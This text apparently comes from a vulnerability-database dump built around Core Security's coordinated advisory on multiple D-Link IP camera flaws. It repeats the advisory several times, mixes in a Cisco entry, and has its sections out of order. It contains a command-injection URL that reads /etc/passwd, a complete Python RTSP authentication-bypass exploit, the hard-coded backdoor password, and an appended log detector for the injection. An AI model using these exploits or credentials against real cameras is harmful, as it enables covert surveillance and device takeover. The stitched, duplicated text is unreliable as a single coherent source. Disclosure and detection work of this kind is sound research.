. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1600]
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
[CVE-2013-1601] and [CVE-2013-1603]
. DCS-3411/3430 - v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1602]
. ALL mentioned devices and firmware.
5. *Vendor Information, Solutions and Workarounds*
D-Link announces that all patches are ready and scheduled for posting on
corporate web site for all customers [2013-04-25]. Contact D-Link for
further information.
6. *Credits*
[CVE-2013-1599], [CVE-2013-1600] and [CVE-2013-1601] were discovered and
researched by Francisco Falcon and Nahuel Riva from Core Exploit Writers
Team.
[CVE-2013-1602] was discovered and researched by Martin Rocha from Core
Impact Pro Team. The PoC was made by Martin Rocha with help of Juan
Cotta from Core QA Team.
[CVE-2013-1603] was discovered and researched by Pablo Santamaria from
Core Security Consulting Services.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *OS Command Injection*
[CVE-2013-1599] A security issue located in '/var/www/cgi-bin/rtpd.cgi'
allows an unauthenticated remote attacker to execute arbitrary commands
through the camera's web interface. The OS command injection is due to
this code in 'rtpd.cgi':
/-----
echo "$QUERY_STRING" | grep -vq ' ' || die "query string cannot contain spaces."
. $conf > /dev/null 2> /dev/null
eval "$(echo $QUERY_STRING | sed -e 's/&/ /g')"
-----/
The first line of this snippet only ensures that there are no spaces in
'$QUERY_STRING'. The last line uses 'sed' to replace ampersands '&' with
spaces and then hands the result to the shell builtin 'eval', which
executes it as a command line. The attacker simply writes '&' wherever a
space is needed, so the space check is defeated, and every other shell
metacharacter (';', '|', '$(...)') in the query string is interpreted.
For example, in order to execute:
/-----
uname -a;cat /etc/passwd
-----/
the following request can be sent to the camera web interface:
/-----
http://192.168.1.100/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd
-----/
7.3. *ASCII Video Stream Information Leak*
[CVE-2013-1601] An ASCII output (the image luminance) of the live video
stream can be accessed by a remote unauthenticated attacker via:
/-----
http://192.168.1.100/md/lums.cgi
-----/
The following example is the output of a coffee pot video stream [2]:
/-----
O O O O O O O O O O O O O O O O O O O O O O O O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O O O o o o O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O . o O O o o o o o o o o o o o
O O O O O O O O O O O O o o O O o . o o o o o o o o o o o o o o
O O O O O O O O O O O O o o o o . o o o o o o o
O O O O O O O O O O o . o O O o . o o o o o o
O O O O O O O O O . o o o o o o
O O O O O O O O . o o o o o o o o
O O O O O O O . o O O o . o o o o o o o o o
O O O O O O o . O O O O O O . o o o o o o o o o
O O O O O O . O O O O O O O . o o o o o o o o o
O O O O O O o O O O O O O O . o . o o o o o o o o
O O O O O O o O O O O O O O . o o o . o o o o o o o o
O O O O O O o O O O O O O o . o O O o O O . o o o o o o o
O O O O O O . o O O O O O O o . O O O o O O . o o o o o o
O O O O O O . O O O O O o . O O o o O O o . o o o o o o
O O O O O O o O O O O O o . o O O o o O O o . o o o o o
O O O O O O O O O O O O . o O O o o O O o . o o o o o
O O O O O O O . o O O O o . o o o O o o O O o . o o o o
O O O O O O O o . O O O o . o o o O o o O O o . o o o o
O O O O O O O O . O O O . o o o O o o O O o . o o o o
O O O O O O O O O O O . o o o O o o O O o . o o o
O O O O O O O O o o O o o o o o O o o o O o . o o o
O O O O O O O O O . O o o o o o O o . o O o . o o
O O O O O O O O O . O o . o o o o O . o O o . o
O O O O O O O O O o o . o o o o o . o O o . o
O O O O O O O O O O . o o o . o . o O o .
o O O O O O O O O O . o o o . o . O o .
o o O O O O O O O O o . o o o . o . O o .
o o o O O O O O O O o . o o o . o . O o .
-----/
7.4. *RTSP Authentication Bypass*
[CVE-2013-1602] This vulnerability is triggered because:
1. Authentication is only enforced on DESCRIBE requests, not on every
subsequent request.
2. When the RTSP session is being established, the authentication
request of the current session is ignored (a previously stored response
is used instead).
As a result, the video stream can be accessed by an unauthenticated
remote attacker. The following proof of concept demonstrates the issue:
/-----
# RTSP authentication bypass proof of concept from the advisory (Python 2:
# print statement, xrange, str-based sockets).
import sys
from socket import *
from threading import Thread
import time, re

LOGGING = 1

def log(s):
    if LOGGING:
        print '(%s) %s' % (time.ctime(), s)

class UDPRequestHandler(Thread):
    # Forwards one UDP datagram to the camera and relays the reply back.
    def __init__(self, data_to_send, recv_addr, dst_addr):
        Thread.__init__(self)
        self.data_to_send = data_to_send
        self.recv_addr = recv_addr
        self.dst_addr = dst_addr

    def run(self):
        sender = socket(AF_INET, SOCK_DGRAM)
        sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        sender.sendto(self.data_to_send, self.dst_addr)
        response = sender.recv(1024)
        sender.sendto(response, self.recv_addr)
        sender.close()

class UDPDispatcher(Thread):
    # One listener per RTP/RTCP port announced by the camera.
    dispatchers = []

    def __has_dispatcher_for(self, port):
        return any([d.src_port == port for d in UDPDispatcher.dispatchers])

    def __init__(self, src_port, dst_addr):
        Thread.__init__(self)
        if self.__has_dispatcher_for(src_port):
            raise Exception('There is already a dispatcher for port %d' % src_port)
        self.src_port = src_port
        self.dst_addr = dst_addr
        UDPDispatcher.dispatchers.append(self)

    def run(self):
        listener = socket(AF_INET, SOCK_DGRAM)
        listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        listener.bind(('', self.src_port))
        while 1:
            try:
                data, recv_addr = listener.recvfrom(1024)
                if not data: break
                UDPRequestHandler(data, recv_addr, self.dst_addr).start()
            except Exception as e:
                print e
                break
        listener.close()
        UDPDispatcher.dispatchers.remove(self)

class PipeThread(Thread):
    # Copies data from source to sink, passing it through a callback first.
    pipes = []

    def __init__(self, source, sink, process_data_callback=lambda x: x):
        Thread.__init__(self)
        self.source = source
        self.sink = sink
        self.process_data_callback = process_data_callback
        PipeThread.pipes.append(self)

    def run(self):
        while 1:
            try:
                data = self.source.recv(1024)
                data = self.process_data_callback(data)
                if not data: break
                self.sink.send(data)
            except Exception as e:
                log(e)
                break
        PipeThread.pipes.remove(self)

class TCPTunnel(Thread):
    # Local TCP listener that proxies each connection to the camera.
    def __init__(self, src_port, dst_addr, process_data_callback=lambda x: x):
        Thread.__init__(self)
        log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port, dst_addr[0], dst_addr[1]))
        self.dst_addr = dst_addr
        self.process_data_callback = process_data_callback
        # Create TCP listener socket
        self.sock = socket(AF_INET, SOCK_STREAM)
        self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        self.sock.bind(('', src_port))
        self.sock.listen(5)

    def run(self):
        while 1:
            # Wait until a new connection arises
            newsock, address = self.sock.accept()
            # Create forwarder socket
            fwd = socket(AF_INET, SOCK_STREAM)
            fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
            fwd.connect(self.dst_addr)
            # Pipe them!
            PipeThread(newsock, fwd, self.process_data_callback).start()
            PipeThread(fwd, newsock, self.process_data_callback).start()

class Camera():
    def __init__(self, address):
        self.address = address

    def get_describe_data(self):
        return ''

class DLink(Camera):
    # D-Link DCS-2102/1.06-5731
    def __init__(self, address):
        Camera.__init__(self, address)

    def get_describe_data(self):
        # SDP body previously captured from the camera (the "stored response").
        return '\x76\x3d\x30\x0d\x0a\x6f\x3d\x43\x56\x2d\x52\x54\x53\x50\x48\x61\x6e\x64\x6c\x65\x72\x20\x31\x31\x32\x33\x34\x31\x32\x20\x30\x20\x49\x4e\x20\x49\x50\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x2e\x31\x31\x0d\x0a\x73\x3d\x44\x43\x53\x2d\x32\x31\x30\x32\x0d\x0a\x63\x3d\x49\x4e\x20\x49\x50\x34\x20\x30\x2e\x30\x2e\x30\x2e\x30\x0d\x0a\x74\x3d\x30\x20\x30\x0d\x0a\x61\x3d\x63\x68\x61\x72\x73\x65\x74\x3a\x53\x68\x69\x66\x74\x5f\x4a\x49\x53\x0d\x0a\x61\x3d\x72\x61\x6e\x67\x65\x3a\x6e\x70\x74\x3d\x6e\x6f\x77\x2d\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x2a\x0d\x0a\x61\x3d\x65\x74\x61\x67\x3a\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0d\x0a\x6d\x3d\x76\x69\x64\x65\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x39\x36\x0d\x0a\x62\x3d\x41\x53\x3a\x31\x38\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x39\x36\x20\x4d\x50\x34\x56\x2d\x45\x53\x2f\x39\x30\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x31\x0d\x0a\x61\x3d\x66\x6d\x74\x70\x3a\x39\x36\x20\x70\x72\x6f\x66\x69\x6c\x65\x2d\x6c\x65\x76\x65\x6c\x2d\x69\x64\x3d\x31\x3b\x63\x6f\x6e\x66\x69\x67\x3d\x30\x30\x30\x30\x30\x31\x42\x30\x30\x31\x30\x30\x30\x30\x30\x31\x42\x35\x30\x39\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x43\x34\x38\x38\x42\x41\x39\x38\x35\x31\x34\x30\x34\x33\x43\x31\x34\x34\x33\x46\x3b\x64\x65\x63\x6f\x64\x65\x5f\x62\x75\x66\x3d\x37\x36\x38\x30\x30\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a\x6d\x3d\x61\x75\x64\x69\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x30\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x30\x20\x50\x43\x4d\x55\x2f\x38\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x32\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a'

class RTSPAuthByPasser():
    DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
    UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
    SERVER_PORT_ARGUMENTS = 'server_port='
    DEFAULT_CSEQ = 1
    DEFAULT_SERVER_PORT_RANGE = '5556-5559'

    def __init__(self, local_port, camera):
        self.last_describe_req = ''
        self.camera = camera
        self.local_port = local_port

    def start(self):
        log('[!] Starting bypasser')
        TCPTunnel(self.local_port, self.camera.address, self.spoof_rtsp_conn).start()

    def spoof_rtsp_conn(self, data):
        # Called for every chunk flowing in either direction through the tunnel.
        if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
            self.last_describe_req = data
        elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and self.last_describe_req:
            log('[!] Unauthorized response received. Spoofing...')
            spoofed_describe = self.camera.get_describe_data()
            # Look for the request CSeq
            m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*', self.last_describe_req)
            cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
            # Create the response
            data = 'RTSP/1.0 200 OK\r\n'
            data += 'CSeq: %s\r\n' % cseq
            data += 'Content-Type: application/sdp\r\n'
            data += 'Content-Length: %d\r\n' % len(spoofed_describe)
            data += '\r\n'
            # Attach the spoofed describe
            data += spoofed_describe
        elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
            # Look for the server RTP ports
            m = re.search('.*%s\\s*(.+?)[;|\r].*' % RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
            ports = m.group(1) if m else RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
            # For each port in the range create a UDP dispatcher
            begin_port, end_port = map(int, ports.split('-'))
            for udp_port in xrange(begin_port, end_port + 1):
                try:
                    UDPDispatcher(udp_port, (self.camera.address[0], udp_port)).start()
                except:
                    pass
        return data

if __name__ == '__main__':
    if len(sys.argv) >= 3:
        listener_port = camera_port = int(sys.argv[1])
        camera_ip = sys.argv[2]
        if len(sys.argv) == 4:
            camera_port = int(sys.argv[3])
        RTSPAuthByPasser(listener_port, DLink((camera_ip, camera_port))).start()
    else:
        print 'usage: python %s [local_port] [camera_ip] [camera_rtsp_port]' % sys.argv[0]
-----/
7.5. *RTSP Hard-Coded Credentials*
[CVE-2013-1603] RTSP service contains hard-coded credentials that
effectively serve as a backdoor, which allows remote attackers to access
the RTSP video stream.
/-----
username: (any)
password: ?*
-----/
As the following dump shows, the submitted credentials are compared with
the string ':?*' using 'strncmp' with a length of 3 (the character ':' is
the separator in the concatenated 'username:password', which is why any
username is accepted). This code belongs to the binary 'rtspd':
/-----
.text:00011468 loc_11468 ; Load from Memory
.text:00011468 LDR R3, [R11,#s2]
.text:0001146C STR R3, [R11,#var_C0] ; Store to Memory
.text:00011470 LDR R2, [R11,#var_C0] ; Load from Memory
.text:00011474 LDR R3, [R11,#var_BC] ; Load from Memory
.text:00011478 ADD R3, R2, R3 ; Rd = Op1 + Op2
.text:0001147C SUB R3, R3, #3 ; Rd = Op1 - Op2
.text:00011480 STR R3, [R11,#var_C0] ; Store to Memory
.text:00011484 LDR R0, [R11,#var_C0] ; s1
.text:00011488 LDR R1, =asc_1B060 ; ":?*" <-------
.text:0001148C MOV R2, #3 ; n
.text:00011490 BL strncmp ; Branch with Link
.text:00011494 MOV R3, R0 ; Rd = Op2
.text:00011498 CMP R3, #0 ; Set cond. codes on Op1 - Op2
.text:0001149C BNE loc_114BC ; Branch
-----/
8. *Report Timeline*
. 2013-03-19: Core Security Technologies notifies the D-Link team of the vulnerability.
. 2013-03-20: D-Link team asks for a technical description of the vulnerability.
. 2013-03-20: Core sends a draft advisory with technical details and sets the estimated publication date of the advisory for May 14th, 2013.
. 2013-03-20: Vendor notifies that D-Link Corporation has an unpublished bounty program for security advisors. The bounty program requires both Core Security and D-Link to sign a memo of understanding (MoU).
. 2013-03-25: Core notifies that receiving money from vendors may bias the view of the report and rejects the bounty program.
. 2013-03-29: Vendor notifies that they hope to close the fix ASAP.
. 2013-04-08: Vendor sends the list of vulnerable devices and the associated firmware and notifies that they will release patches and release notes on the D-Link support forum first. Then, an official public release will be announced (approx. 1 month from forum post to full release).
. 2013-04-24: Core asks for a clarification regarding the D-Link release date and notifies that releasing fixes to a privileged closed group and/or a closed forum or list is unacceptable.
. 2013-04-25: Vendor notifies that the patches are ready and scheduled for posting on the D-Link web site over the next few days.
. 2013-04-26: Core notifies that the advisory is re-scheduled for Monday 29th.
. 2013-04-29: Advisory CORE-2013-0303 published.
9. *References*
[1] http://www.dlink.com/us/en/home-solutions/view/network-cameras.
[2] http://corelabs.coresecurity.com/themes/sample_theme/images/coffee-pot.png.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201305-0160 | CVE-2013-1229 | Cisco TelePresence Management Suite on 64-bit platforms denial of service (DoS) vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
TMSSNMPService.exe in TelePresence Manager in Cisco TelePresence Management Suite (TMS) on 64-bit platforms allows remote attackers to cause a denial of service (process crash) via SNMP traps, aka Bug ID CSCue00028.
Successfully exploiting this issue may allow an attacker to cause a denial of service condition.
This issue is being tracked by Cisco Bug ID CSCue00028
| VAR-202001-0843 | CVE-2013-1603 |
Multiple D-Link products: use of hard-coded credentials vulnerability
Related entries in the VARIoT exploits database: VAR-E-201304-0137 |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
An Authentication vulnerability exists in D-LINK WCS-1100 1.02, TESCO DCS-2121 1.05_TESCO, TESCO DCS-2102 1.05_TESCO, DCS-7510 1.00, DCS-7410 1.00, DCS-6410 1.00, DCS-5635 1.01, DCS-5605 1.01, DCS-5230L 1.02, DCS-5230 1.02, DCS-3430 1.02, DCS-3411 1.02, DCS-3410 1.02, DCS-2121 1.06_FR, DCS-2121 1.06, DCS-2121 1.05_RU, DCS-2102 1.06_FR, DCS-2102 1.06, DCS-2102 1.05_RU, DCS-1130L 1.04, DCS-1130 1.04_US, DCS-1130 1.03, DCS-1100L 1.04, DCS-1100 1.04_US, and DCS-1100 1.03 due to hard-coded credentials that serve as a backdoor, which allows remote attackers to access the RTSP video stream. Multiple D-Link products contain a vulnerability involving the use of hard-coded credentials. Information may be obtained. There are security vulnerabilities in multiple D-Link webcam products. The account username is arbitrary and the password is "?*".
Remote attackers can exploit this issue to bypass the authentication mechanism and gain unauthorized access.
1. *Advisory Information*
Title: D-Link IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0303
Advisory URL:
http://www.coresecurity.com/advisories/d-link-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-03-29
Vendors contacted: D-Link Corporation
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Authentication issues [CWE-287],
Information leak through GET request [CWE-598], Authentication issues
[CWE-287], Use of hard-coded credentials [CWE-798]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1599, CVE-2013-1600, CVE-2013-1601, CVE-2013-1602,
CVE-2013-1603
3. *Vulnerability Description*
Multiple vulnerabilities have been found in D-Link IP cameras [1] that
could allow an unauthenticated remote attacker:
1. [CVE-2013-1599] to execute arbitrary commands from the
administration web interface,
2. [CVE-2013-1600] to access the video stream via HTTP,
3. [CVE-2013-1601] to access the ASCII video stream via image luminance,
4. [CVE-2013-1602] to access the video stream via RTSP,
5. [CVE-2013-1603] to bypass RTSP authentication using hard-coded
credentials.
4. *Vulnerable Packages*
The following is the list of affected devices and the associated
firmware (confirmed by D-Link). Other SKUs are probably affected too,
but they were not checked.
[CVE-2013-1599]
. DCS-3411/3430 - firmware v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1600]
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
[CVE-2013-1601] and [CVE-2013-1603]
. DCS-3411/3430 - v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1602]
. ALL mentioned devices and firmware.
5. *Vendor Information, Solutions and Workarounds*
D-Link announces that all patches are ready and scheduled for posting on
corporate web site for all customers [2013-04-25]. Contact D-Link for
further information.
6. *Credits*
[CVE-2013-1599], [CVE-2013-1600] and [CVE-2013-1601] were discovered and
researched by Francisco Falcon and Nahuel Riva from Core Exploit Writers
Team.
[CVE-2013-1602] was discovered and researched by Martin Rocha from Core
Impact Pro Team. The PoC was made by Martin Rocha with help of Juan
Cotta from Core QA Team.
[CVE-2013-1603] was discovered and researched by Pablo Santamaria from
Core Security Consulting Services.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
| VAR-202001-0841 | CVE-2013-1601 |
Multiple D-Link products: information disclosure vulnerability
Related entries in the VARIoT exploits database: VAR-E-201304-0137 |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
An Information Disclosure vulnerability exists due to a failure to restrict access on the lums.cgi script when processing a live video stream in D-LINK WCS-1100 1.02, TESCO DCS-2121 1.05_TESCO, TESCO DCS-2102 1.05_TESCO, DCS-7510 1.00, DCS-7410 1.00, DCS-6410 1.00, DCS-5635 1.01, DCS-5605 1.01, DCS-5230L 1.02, DCS-5230 1.02, DCS-3430 1.02, DCS-3411 1.02, DCS-3410 1.02, DCS-2121 1.06_FR, DCS-2121 1.06, DCS-2121 1.05_RU, DCS-2102 1.06_FR, DCS-2102 1.06, DCS-2102 1.05_RU, DCS-1130L 1.04, DCS-1130 1.04_US, DCS-1130 1.03, DCS-1100L 1.04, DCS-1100 1.04_US, and DCS-1100 1.03, which could let a malicious user obtain sensitive information. Multiple D-Link products contain an information disclosure vulnerability. Information may be obtained. There are security vulnerabilities in multiple D-Link webcam products.
Title: D-Link IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0303
Advisory URL:
http://www.coresecurity.com/advisories/d-link-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-03-29
Vendors contacted: D-Link Corporation
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Authentication issues [CWE-287],
Information leak through GET request [CWE-598], Authentication issues
[CWE-287], Use of hard-coded credentials [CWE-798]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1599, CVE-2013-1600, CVE-2013-1601, CVE-2013-1602,
CVE-2013-1603
3. *Vulnerability Description*
Multiple vulnerabilities have been found in D-Link IP cameras [1] that
could allow an unauthenticated remote attacker:
1. [CVE-2013-1599] to execute arbitrary commands from the
administration web interface,
2. [CVE-2013-1600] to access the video stream via HTTP,
3. [CVE-2013-1601] to access the ASCII video stream via image luminance,
4. [CVE-2013-1602] to access the video stream via RTSP,
5. [CVE-2013-1603] to bypass RTSP authentication using hard-coded
credentials.
4. *Vulnerable Packages*
The following is the list of affected devices and the associated
firmware (confirmed by D-Link). Other SKUs are probably affected too,
but they were not checked.
[CVE-2013-1599]
. DCS-3411/3430 - firmware v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1600]
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
[CVE-2013-1601] and [CVE-2013-1603]
. DCS-3411/3430 - v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1602]
. ALL mentioned devices and firmware.
5. *Vendor Information, Solutions and Workarounds*
D-Link announces that all patches are ready and scheduled for posting on
the corporate web site for all customers [2013-04-25]. Contact D-Link for
further information.
6. *Credits*
[CVE-2013-1599], [CVE-2013-1600] and [CVE-2013-1601] were discovered and
researched by Francisco Falcon and Nahuel Riva from Core Exploit Writers
Team.
[CVE-2013-1602] was discovered and researched by Martin Rocha from Core
Impact Pro Team. The PoC was made by Martin Rocha with the help of Juan
Cotta from Core QA Team.
[CVE-2013-1603] was discovered and researched by Pablo Santamaria from
Core Security Consulting Services.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *OS Command Injection*
[CVE-2013-1599] A security issue located in '/var/www/cgi-bin/rtpd.cgi'
allows an unauthenticated remote attacker to execute arbitrary commands
through the camera's web interface. The OS command injection is due to
this code in 'rtpd.cgi':
/-----
echo "$QUERY_STRING" | grep -vq ' ' || die "query string cannot contain spaces."
. $conf > /dev/null 2> /dev/null
eval "$(echo $QUERY_STRING | sed -e 's/&/ /g')"
-----/
The first line of this snippet only ensures that there are no spaces in
'$QUERY_STRING'. The last line uses 'sed' to replace every ampersand '&'
with a space and then passes the result to the shell built-in 'eval', so
the query string is executed as a command line: a typical command
injection. For example, in order to execute:
/-----
uname -a;cat /etc/passwd
-----/
the following request can be sent to the camera web interface:
/-----
http://192.168.1.100/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd
-----/
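The transformation the CGI applies to the query string can be mirrored exactly, which gives a log-side detector for injection attempts and a hardened parser that validates the pairs instead of evaluating them. This is an added example, not code from the advisory or from D-Link firmware; the access log lines are constructed, and the assumption that legitimate rtpd.cgi queries consist only of key=value pairs is mine, not the advisory's.

```python
import re

# Mirror of what rtpd.cgi does with $QUERY_STRING: the grep check rejects any
# query containing a space, then every '&' becomes a space and the result goes
# to eval. Returns the exact command line the shell would evaluate, or None
# when the CGI would refuse the query before evaluating anything.
def command_evaluated_by_rtpd(query_string):
    if ' ' in query_string:
        return None
    return query_string.replace('&', ' ')

# Assumption (not stated in the advisory): legitimate rtpd.cgi queries consist
# only of key=value pairs drawn from a conservative character set.
SAFE_ASSIGNMENT = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*=[A-Za-z0-9_.:-]*$')

def is_injection_attempt(query_string):
    """True when eval would run anything other than plain variable assignments."""
    cmd = command_evaluated_by_rtpd(query_string)
    if cmd is None:
        return False
    words = [w for w in cmd.split(' ') if w]
    return not all(SAFE_ASSIGNMENT.match(w) for w in words)

def parse_query_safely(query_string):
    """Hardened counterpart of the eval line: validate each pair and return a
    dict; nothing is ever executed. Raises ValueError on any other input."""
    params = {}
    for pair in query_string.split('&'):
        if not SAFE_ASSIGNMENT.match(pair):
            raise ValueError('rejected query parameter: %r' % pair)
        key, value = pair.split('=', 1)
        params[key] = value
    return params

# Constructed Apache-style access log lines (not taken from any real device).
SAMPLE_LOG = """\
192.168.1.50 - - [29/Apr/2013:10:01:12 +0000] "GET /cgi-bin/rtpd.cgi?port=5556&proto=udp HTTP/1.1" 200 42
192.168.1.77 - - [29/Apr/2013:10:02:03 +0000] "GET /cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd HTTP/1.1" 200 1320
192.168.1.77 - - [29/Apr/2013:10:02:09 +0000] "GET /cgi-bin/rtpd.cgi?x=1;id HTTP/1.1" 200 60
192.168.1.50 - - [29/Apr/2013:10:03:44 +0000] "GET /md/lums.cgi HTTP/1.1" 200 8800
"""

LOG_LINE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                      r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)')

def find_rtpd_injections(log_text):
    """Scan access-log text and return one record per rtpd.cgi request whose
    query string would have been evaluated as something other than assignments."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or '?' not in m.group('path'):
            continue
        script, query = m.group('path').split('?', 1)
        if not script.endswith('/rtpd.cgi') or not is_injection_attempt(query):
            continue
        hits.append({'src': m.group('src'), 'time': m.group('ts'), 'query': query,
                     'evaluated': command_evaluated_by_rtpd(query)})
    return hits

if __name__ == '__main__':
    for hit in find_rtpd_injections(SAMPLE_LOG):
        print('%(time)s %(src)s rtpd.cgi would eval: %(evaluated)s' % hit)
```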
7.2. *ASCII Video Stream Information Leak*
